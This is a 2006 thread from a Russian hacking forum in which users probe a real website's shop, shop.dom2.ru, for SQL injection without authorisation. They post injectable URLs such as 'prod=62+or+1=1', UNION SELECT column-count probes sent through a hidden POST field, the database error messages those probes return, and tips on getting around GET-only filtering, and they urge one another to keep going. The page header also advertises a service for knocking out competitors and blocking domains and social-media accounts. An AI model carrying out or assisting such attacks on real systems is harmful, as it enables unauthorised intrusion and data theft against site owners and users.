Форум АНТИЧАТ - SQL-injection dom2.ru

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Оффтоп > Болталка
SQL-injection dom2.ru

Страница 1 из 4

Опции темы

Поиск в этой теме

Опции просмотра

SQL-injection dom2.ru

09.10.2006, 19:34

steamer

Познающий

Регистрация: 03.05.2006

Сообщений: 82

Провел на форуме:
219818

Репутация: 10

Отправить сообщение для steamer с помощью ICQ

SQL-injection dom2.ru

Не люблю дом 2 и решил полазить по сайту. Полазив увидел, что вроде в ссылка и в формах везде стоит фильтрующий скрипт, т.е. никакой ' и других похожих знаков, а также union и другие слова. Только вот в магазине, при в url (да и не только в магазине) можно написать &id=1+1 или что-то похожее, но есть скрипт, который не фильтрует union запросы. Единственная проблема, вкл мэджик квоутс. Полазил сам, но нет времени и желания дальше разрабатывать. Кто хочет, смотрите:

http://shop.dom2.ru/shop/index.phtml?prod=62%200 - Вызывает ошибку.

Там есть скрытое поле prod, в которое можно вводить текст типа 0 union select * from ...

Дерзайте. Только обязательно расскажите, что еще там можно.

09.10.2006, 19:52

Utochka

Постоянный

Регистрация: 21.12.2005

Сообщений: 620

Провел на форуме:
1867718

Репутация: 268

думаю что бы проще было подобрать поля, нужно взять журнал хакер в котором было видео про взлом дом2 и глянуть там названия полей и собственно структуру базы

09.10.2006, 23:24

~~Digimortal~~

Banned

Регистрация: 22.08.2006

Сообщений: 608

Провел на форуме:
6144796

Репутация: 1095

хе, я недавно эту скуль в магазине тоже обнаруживал..
щас посмотрю что там на видео было...

10.10.2006, 12:44

steamer

Познающий

Регистрация: 03.05.2006

Сообщений: 82

Провел на форуме:
219818

Репутация: 10

Так что, это уже было, а в каком номере? Я че-то летом на журнал забил.

10.10.2006, 16:26

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Иньекция на лицо....
http://shop.dom2.ru/shop/index.phtml?prod=62+or+1=1
Кто выложите видео или структуру...

10.10.2006, 17:08

Ch3ck

Познавший АНТИЧАТ

Регистрация: 09.06.2006

Сообщений: 1,359

Провел на форуме:
5301021

Репутация: 1879

_http://shop.dom2.ru/shop/index.phtml?prod=.

Код:

 
Query Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1Query Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

_http://shop.dom2.ru/shop/index.phtml?prod=...

Код HTML:

Query Error!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1

Хм, вещь какая-то:
_http://img145.imageshack.us/my.php?image=dombh0.jpg

Последний раз редактировалось Dr.Check; 10.10.2006 в 17:28..

10.10.2006, 17:38

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

баян.. после 1го взлома там все фильтруется, юнион селект не проведешь - фильтр на некотрые нужные символы, а во вторых там ограничение на длину пеерменной .. символов 10 не больше (не помню точно).

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

10.10.2006, 17:48

~~Digimortal~~

Banned

Регистрация: 22.08.2006

Сообщений: 608

Провел на форуме:
6144796

Репутация: 1095

Цитата:

Сообщение от blackybr

так это фильтруется если через ГЕТ (фильтруются не только некоторые символы, но и "union" и "select" и еще кой че), а если вставлять запрос через hidden-поле в сурсе, то запросы ПОСТОМ проходят...

Последний раз редактировалось Digimortal; 10.10.2006 в 17:59..

10.10.2006, 17:54

~~Digimortal~~

Banned

Регистрация: 22.08.2006

Сообщений: 608

Провел на форуме:
6144796

Репутация: 1095

Цитата:

Сообщение от steamer

Так что, это уже было, а в каком номере? Я че-то летом на журнал забил.

это было в 76 номере, кстати, эти ошибки там уже и описывались...
а видео я к сожалению так и не нашел..

#10

10.10.2006, 17:57

steamer

Познающий

Регистрация: 03.05.2006

Сообщений: 82

Провел на форуме:
219818

Репутация: 10

Да, фильтр только на гет стоит. Вообще из личных наблюдений, то там параметр prod исользуется 2 запросами, в одном из них выводится 5 значений (полей), в другом 8. Если в хиден поле такое

0 UNION SELECT null
то ошибки две
Query Error!

The used SELECT statements have a different number of columnsQuery Error!

The used SELECT statements have a different number of columns

Если

0 union select null,null,null,null,null

или

0 union select null,null,null,null,null,null,null,null

то одна
Query Error!

The used SELECT statements have a different number of columns

Сложность в том, что в любом случае я не смог работать, потому что не видел результата из-за одной из ошибок. Использование char() вроде запрещено. Хотя я не уверен, до этого редко с ним работал, но вроде получалось.

Страница 1 из 4

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
SQL Injection для чайников, взлом ASP+MSSQL	k00p3r	Чужие Статьи	0	12.06.2005 12:42
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход